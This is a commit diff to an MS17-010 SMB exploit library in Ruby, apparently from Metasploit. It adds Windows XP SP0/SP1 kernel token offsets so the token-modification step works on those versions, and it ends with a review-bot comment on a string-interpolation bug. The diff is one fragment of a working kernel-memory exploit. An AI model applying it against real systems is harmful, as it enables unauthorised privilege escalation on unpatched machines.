
Commit 7007bc1

author
zerosum0x0
committed
hopefully fixed XP SP0/SP1 issues
1 parent cfb7aa6 commit 7007bc1

1 file changed

+20
-1
lines changed


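--- a/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
+++ b/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
@@ -124,6 +124,23 @@ def modify_token()
 
 userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0] #unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
 userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0] #unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
+
+if @ctx['os'] == 'WINXP' and @ctx['arch'] == 'x86'
+if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
+print_error("Bad TOKEN offsets detected (group count = #{userAndGroupCount}), performing workaround...")
+@ctx['TOKEN_USER_GROUP_CNT_OFFSET'] = @ctx['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
+@ctx['TOKEN_USER_GROUP_ADDR_OFFSET'] = @ctx['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1']
+
+userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0]
+userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0]
+
+# hopefully its not bad anymore
+if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
+raise MS17_010_Error, 'Bad TOKEN offsets after workround (group count = #{userAndGroupCount})... Abort > BSOD'
+end
+end
+end
+
 vprint_status("UserAndGroupCount: 0x#{userAndGroupCount.to_s}")
 vprint_status("UserAndGroupsAddr: 0x#{userAndGroupsAddr.to_s(16)}")
 
@@ -183,7 +200,7 @@ def write_what_where(what, where)
 
 def read_data(read_addr, read_size)
 if read_addr == 0
-raise MS17_010_Error, 'Attempted to read from a NULL pointer!'
+raise MS17_010_Error, 'Attempted to read from a NULL pointer!'
 end
 
 fmt = @ctx['PTR_FMT']
@@ -1190,6 +1207,8 @@ def calc_alloc_size(size, align_size)
 'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
 'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
 'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
+'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'=> 0x40,
+'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'=> 0x5c,
 }
 
 WIN2K_32_SESSION_INFO = {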
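Review bot: The abort message at new line 139 of the first hunk is a single-quoted string, so `#{userAndGroupCount}` is never interpolated and the raised MS17_010_Error will literally read `(group count = #{userAndGroupCount})`, whereas the print_error on line 130 uses double quotes and interpolates correctly. Change it to `raise MS17_010_Error, "Bad TOKEN offsets after workaround (group count = #{userAndGroupCount})... Abort > BSOD"`, which also fixes the "workround" typo. As a point of style, the guards on lines 128, 129 and 138 use `and`/`or`; `&&`/`||` is the idiomatic choice for boolean conditions and avoids the low-precedence trap if the expressions are ever extended. The workaround also overwrites the two `@ctx` offset keys in place, so every later reader of those keys sees the SP0/SP1 values for the rest of the session; a one-line comment such as `# persist the SP0/SP1 offsets so later token reads use them too` would make that intent explicit. modify_token's body starts and ends outside the hunk, so whether anything downstream depends on the original offsets cannot be confirmed from here.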
